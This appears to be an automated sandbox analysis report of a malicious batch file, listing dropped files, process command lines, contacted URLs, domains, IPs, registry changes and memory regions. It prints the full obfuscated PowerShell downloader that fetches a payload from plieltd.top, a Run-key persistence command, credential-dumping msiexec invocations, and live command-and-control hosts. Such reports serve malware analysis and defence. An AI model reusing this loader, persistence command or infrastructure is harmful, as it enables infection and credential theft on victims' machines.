Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat
|
ASCII text, with very long lines (6231), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n15klkbc.0e1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s51vsxw5.5il.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vuwvtkwx.eay.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwvawv05.mex.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv6E57.tmp
|
Extensible storage user DataBase, version 0x620, checksum 0x5ad2f074, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\husdhpbhpulhbvjgwsomcgo
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1H23IT04ZX4H4CJOLMTT.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Unslave.Mel
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 3 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat"
"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers
Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI;
function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological;
for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function
kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose
';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac
S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc
knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf
';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot
AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta
rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn
';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds
:EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv
SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI
atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl
UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi
AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP
O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper
PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes
'.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB
eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat
');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHopllMotoiRetosSenseStard emo.ForeHCo,ae
OpgaCha dSelseAflarTomjsSu.b[ Bip$ PreH madaDecriF odrReevsIzbatWalky Fonl FoliIndesEne tJac.sKorr]Akan=Dest$Ju eLFo eiR fov
de eUnp lnyt y .kr ');$Netvrkslsningens=Fyrsternes ' Nor$SadhI PinmKa,smUssioStr,rPhaltPrinaSymmlBialicratsFi.eeAdrodTole.
Ro.Dnsk,o DecwprotnGuailSengoT,kka u,bd BolFM noiR velBir e Me (Egyp$ Af.HexpeyTorepUdgae U,sridion ecoiPe ncScen,Ne.r$,ranBDolkaMaplrAutetGri.hWouloPhenl,mbloo
rnmUncoeFllea w snnaal)tam. ';$Bartholomean=$Ferias5;kaldedes (Fyrsternes 'Hier$ Ti gAll L tikOConvBTingaSkyplUnde: MisFTevaABomuNBehaFUnc
aChokR WraoAce,n Bo AFlygd B.seR,mp1Gaml2 ,en8u io= Fun( Reot Fr,EAaresUn eT Re -SporPBrugaBun t Or,H.hum Fabr$SamfBPrseaPlisrVatit
.mbHsupeo monL allOtredmSlaue Dela KarnKkke)Refi ');while (!$Fanfaronade128) {kaldedes (Fyrsternes 'Omga$ HungTsarl DenoRevebComiaReenlKrig:PalaOTenddSn
oiUncosTurke TensDisktSy d=Mang$PendtFl trUnthu laneUdra ') ;kaldedes $Netvrkslsningens;kaldedes (Fyrsternes 'StegS Utnt claaQuadRQuadTOver-SabbSEverl
Scaeres,EendeP Emm Vin4tige ');kaldedes (Fyrsternes 'Rygz$,rbegDo,elE poo Civb Sp a FinlBran:Hir.fnaivA Tu,n resFMethak adrCharOTudeNGisnAAcridDullEFire1
.kk2 Son8Apol= er(K.ngtBolveSproSKlipTC ck-.aanP LinAbraitGrusHaphy Tvan$f siB KonaH,tcRInteTExpuHLsenOTa.olVandoG.unM NagEDe
cA PreNPerg)Cast ') ;kaldedes (Fyrsternes 'Stel$Su.egDebaL ChioD,ssBLionADiselRoya:Phy i TelNTeetDpunkeEft,NModtr ReaiS,ufGBriksGardF
Reml SteY MalV ,inNNonciM llNDruiGTo aeRangRtabuN RedeV,de=Ha m$ En gInsplSenaOKanebEnj,ANonpl gro:EcottNaturOph.uNon ISmurnDyrpgA
lv+I am+Pref%A,ch$.eskUAposD .roGBrneiP,ocfAdelTMesosDivibMet E UndhsystOReedv erEFortTAf.is Ups.D ggCTu eOBilbu MicN KryTT
ta ') ;$Hypernic=$Udgiftsbehovets[$Indenrigsflyvningerne];}$Begravelsesaftale=340812;$Kuverts=30123;kaldedes (Fyrsternes 'Arbe$
SoeGS.bflStjiONonsB Su aUdstlGui : Bu.SIndvoCervLBilldGaloE dprHea i StaSQui TCholE HalNkachSanst J te=Acti ElogSpeceaarbtFort-
E tCAfvaOAgniNPoohTCouneHumiNFlastWi,d Lovr$FlskbShipA O grBriltBelgHRenoOAc dlKultoHundM SkaeramiAVul nK.lo ');kaldedes (Fyrsternes
'Fred$w ndg Re,lVirgoBonbbUnbuaUnmulPr k:Or fSFagba ,admfranmPl ueRivenBa,ifRe.eaflakl Un.dfi neBattnFamieO kesAppe Afm=
Tru Tilk[ GtsSG upyLysesChantCutleCircm P.d.Piz CKonooSnornLigkvCo se,iblrTeknt,eba]Meka: ydr: s lFKederDagko Senm O oBCr
eaSubfs reveIn i6Revu4I feS FratCounrRavniFlaxnUnsmgLuxu(Bibe$LancSIncoo.virlOverdCause Decr Be iFlaksVltetTaabetilenMaltsChol)Fjer
');kaldedes (Fyrsternes 'St,r$GbakGCholLTotaoKu sbTazeADesaL han: W nOBahiVfodsEUnf R a.tfKl nlHyalOStemRMenti ,nodSe o Re,r=
Slr Fode[ codSMi,rY TansVrelTSvr EByplm re.LnkltR,adE npxEvertHemo.E,eweF rmnSnuec BerO oredNonvITerrn BroG Fri]C,nd:ange:GgeuADuplsVidecIndsI
UnsII di. desgSub eBe zTBollSSrgeti.lur ndeiModgnBlacGDeta( Mon$ph.nSAp,paRepomRe em RapEAntinKommFR ylaNortlUneldMeadeHar,nIndee
.usS Va )Term ');kaldedes (Fyrsternes 'Ja.t$Stamg Te lPearo,uidbNo.eAMod LDomm:Gr,rAFo tLbesslSlvsEDe,elHaziUR.glJ Nada Dia7C,st8
For=Weig$AlkiO OveV R ve MaiR O,tfViddLApotOInterBi bIKangdIde .Erh sRensU ennbFej srefotFirkRBliaI.anonNoncgBugt( Ant$OutdBStatEAareGTilbR
Misa An.VSkile roLAnalS.vrdeC,sssUndeaRnkefBe.oTAegfa.hamLLubbeVide,triv$BlaakIlliUSta,V ksePrenr Selt,krms Pri)Blue ');kaldedes
$Alleluja78;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes
Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare
#>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological;
for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function
kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose
';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac
S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc
knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf
';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot
AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta
rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn
';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds
:EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv
SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI
atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl
UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi
AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP
O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper
PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes
'.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB
eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat
');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHopllMotoiRetosSenseStard emo.ForeHCo,ae
OpgaCha dSelseAflarTomjsSu.b[ Bip$ PreH madaDecriF odrReevsIzbatWalky Fonl FoliIndesEne tJac.sKorr]Akan=Dest$Ju eLFo eiR fov
de eUnp lnyt y .kr ');$Netvrkslsningens=Fyrsternes ' Nor$SadhI PinmKa,smUssioStr,rPhaltPrinaSymmlBialicratsFi.eeAdrodTole.
Ro.Dnsk,o DecwprotnGuailSengoT,kka u,bd BolFM noiR velBir e Me (Egyp$ Af.HexpeyTorepUdgae U,sridion ecoiPe ncScen,Ne.r$,ranBDolkaMaplrAutetGri.hWouloPhenl,mbloo
rnmUncoeFllea w snnaal)tam. ';$Bartholomean=$Ferias5;kaldedes (Fyrsternes 'Hier$ Ti gAll L tikOConvBTingaSkyplUnde: MisFTevaABomuNBehaFUnc
aChokR WraoAce,n Bo AFlygd B.seR,mp1Gaml2 ,en8u io= Fun( Reot Fr,EAaresUn eT Re -SporPBrugaBun t Or,H.hum Fabr$SamfBPrseaPlisrVatit
.mbHsupeo monL allOtredmSlaue Dela KarnKkke)Refi ');while (!$Fanfaronade128) {kaldedes (Fyrsternes 'Omga$ HungTsarl DenoRevebComiaReenlKrig:PalaOTenddSn
oiUncosTurke TensDisktSy d=Mang$PendtFl trUnthu laneUdra ') ;kaldedes $Netvrkslsningens;kaldedes (Fyrsternes 'StegS Utnt claaQuadRQuadTOver-SabbSEverl
Scaeres,EendeP Emm Vin4tige ');kaldedes (Fyrsternes 'Rygz$,rbegDo,elE poo Civb Sp a FinlBran:Hir.fnaivA Tu,n resFMethak adrCharOTudeNGisnAAcridDullEFire1
.kk2 Son8Apol= er(K.ngtBolveSproSKlipTC ck-.aanP LinAbraitGrusHaphy Tvan$f siB KonaH,tcRInteTExpuHLsenOTa.olVandoG.unM NagEDe
cA PreNPerg)Cast ') ;kaldedes (Fyrsternes 'Stel$Su.egDebaL ChioD,ssBLionADiselRoya:Phy i TelNTeetDpunkeEft,NModtr ReaiS,ufGBriksGardF
Reml SteY MalV ,inNNonciM llNDruiGTo aeRangRtabuN RedeV,de=Ha m$ En gInsplSenaOKanebEnj,ANonpl gro:EcottNaturOph.uNon ISmurnDyrpgA
lv+I am+Pref%A,ch$.eskUAposD .roGBrneiP,ocfAdelTMesosDivibMet E UndhsystOReedv erEFortTAf.is Ups.D ggCTu eOBilbu MicN KryTT
ta ') ;$Hypernic=$Udgiftsbehovets[$Indenrigsflyvningerne];}$Begravelsesaftale=340812;$Kuverts=30123;kaldedes (Fyrsternes 'Arbe$
SoeGS.bflStjiONonsB Su aUdstlGui : Bu.SIndvoCervLBilldGaloE dprHea i StaSQui TCholE HalNkachSanst J te=Acti ElogSpeceaarbtFort-
E tCAfvaOAgniNPoohTCouneHumiNFlastWi,d Lovr$FlskbShipA O grBriltBelgHRenoOAc dlKultoHundM SkaeramiAVul nK.lo ');kaldedes (Fyrsternes
'Fred$w ndg Re,lVirgoBonbbUnbuaUnmulPr k:Or fSFagba ,admfranmPl ueRivenBa,ifRe.eaflakl Un.dfi neBattnFamieO kesAppe Afm=
Tru Tilk[ GtsSG upyLysesChantCutleCircm P.d.Piz CKonooSnornLigkvCo se,iblrTeknt,eba]Meka: ydr: s lFKederDagko Senm O oBCr
eaSubfs reveIn i6Revu4I feS FratCounrRavniFlaxnUnsmgLuxu(Bibe$LancSIncoo.virlOverdCause Decr Be iFlaksVltetTaabetilenMaltsChol)Fjer
');kaldedes (Fyrsternes 'St,r$GbakGCholLTotaoKu sbTazeADesaL han: W nOBahiVfodsEUnf R a.tfKl nlHyalOStemRMenti ,nodSe o Re,r=
Slr Fode[ codSMi,rY TansVrelTSvr EByplm re.LnkltR,adE npxEvertHemo.E,eweF rmnSnuec BerO oredNonvITerrn BroG Fri]C,nd:ange:GgeuADuplsVidecIndsI
UnsII di. desgSub eBe zTBollSSrgeti.lur ndeiModgnBlacGDeta( Mon$ph.nSAp,paRepomRe em RapEAntinKommFR ylaNortlUneldMeadeHar,nIndee
.usS Va )Term ');kaldedes (Fyrsternes 'Ja.t$Stamg Te lPearo,uidbNo.eAMod LDomm:Gr,rAFo tLbesslSlvsEDe,elHaziUR.glJ Nada Dia7C,st8
For=Weig$AlkiO OveV R ve MaiR O,tfViddLApotOInterBi bIKangdIde .Erh sRensU ennbFej srefotFirkRBliaI.anonNoncgBugt( Ant$OutdBStatEAareGTilbR
Misa An.VSkile roLAnalS.vrdeC,sssUndeaRnkefBe.oTAegfa.hamLLubbeVide,triv$BlaakIlliUSta,V ksePrenr Selt,krms Pri)Blue ');kaldedes
$Alleluja78;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\husdhpbhpulhbvjgwsomcgo"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\spywiilbdcdmdbgkndbgftixng"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ
/d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle
1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
|
|
|
https://go.micro
|
unknown
|
|
|
|
https://github.com/Pester/Pester
|
unknown
|
|
|
|
pikolee.duckdns.org
|
|
||
|
http://geoplugin.net/json.gp#
|
unknown
|
||
|
http://plieltd.top
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingth
|
unknown
|
||
|
http://geoplugin.net/json.gplA
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://geoplugin.net/json.gp4
|
unknown
|
||
|
https://plieltd.top/Kvalificeredes.qxdP
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaotak
|
unknown
|
||
|
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
|
https://plieltd.top/dUEhUdoBD66.binRekosMaggaranticonstruct.ro/dUEhUdoBD66.bin
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gpalo
|
unknown
|
||
|
https://go.microsoft.co5
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://plieltd.top/dUEhUdoBD66.bin
|
104.21.56.189
|
||
|
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://plieltd.top/Kvalificeredes.qxd
|
104.21.56.189
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://plieltd.top/Kvalificeredes.qxdXRgl8
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
|
unknown
|
||
|
https://www.office.com/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://geoplugin.net/json.gpl
|
unknown
|
||
|
https://plieltd.top
|
unknown
|
||
|
http://www.imvu.compData
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=wsb
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://geoplugin.net/json.gpw
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
|
unknown
|
||
|
https://plieltd.top/
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
|
http://www.nirsoft.net~
|
unknown
|
||
|
https://plieltd.top/dUEhUdoBD66.bine
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://plieltd.top/s
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 42 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
pikolee.duckdns.org
|
143.244.46.150
|
|
|
|
plieltd.top
|
104.21.56.189
|
||
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
143.244.46.150
|
pikolee.duckdns.org
|
United States
|
|
|
|
104.21.56.189
|
plieltd.top
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-MC4T64
|
exepath
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-MC4T64
|
licence
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-MC4T64
|
time
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Driftsikkerheds
|
Dokkedal
|
||
|
HKEY_CURRENT_USER\Environment
|
Dyrespor
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Forsnakket154
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
9833000
|
direct allocation
|
page execute and read and write
|
|
|
|
5729000
|
trusted library allocation
|
page read and write
|
|
|
|
8590000
|
direct allocation
|
page execute and read and write
|
|
|
|
244184D1000
|
trusted library allocation
|
page read and write
|
|
|
|
5F41000
|
heap
|
page read and write
|
|
|
|
5F68000
|
heap
|
page read and write
|
|
|
|
5F55000
|
heap
|
page read and write
|
|
|
|
5F66000
|
heap
|
page read and write
|
|
|
|
5F68000
|
heap
|
page read and write
|
|
|
|
5F68000
|
heap
|
page read and write
|
|
|
|
5F68000
|
heap
|
page read and write
|
|
|
|
400000
|
system
|
page execute and read and write
|
||
|
21F30000
|
heap
|
page read and write
|
||
|
F7A317E000
|
stack
|
page read and write
|
||
|
4D0F000
|
heap
|
page read and write
|
||
|
24420969000
|
heap
|
page read and write
|
||
|
2F25000
|
heap
|
page read and write
|
||
|
24420771000
|
heap
|
page read and write
|
||
|
6A3E000
|
stack
|
page read and write
|
||
|
2905000
|
stack
|
page read and write
|
||
|
4D15000
|
heap
|
page read and write
|
||
|
20FE0000
|
direct allocation
|
page read and write
|
||
|
4D0C000
|
heap
|
page read and write
|
||
|
2442098A000
|
heap
|
page read and write
|
||
|
4F00000
|
trusted library allocation
|
page read and write
|
||
|
84BC000
|
stack
|
page read and write
|
||
|
7F50000
|
heap
|
page read and write
|
||
|
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
|
A233000
|
direct allocation
|
page execute and read and write
|
||
|
24408450000
|
heap
|
page execute and read and write
|
||
|
244208E3000
|
heap
|
page read and write
|
||
|
7450000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D1F000
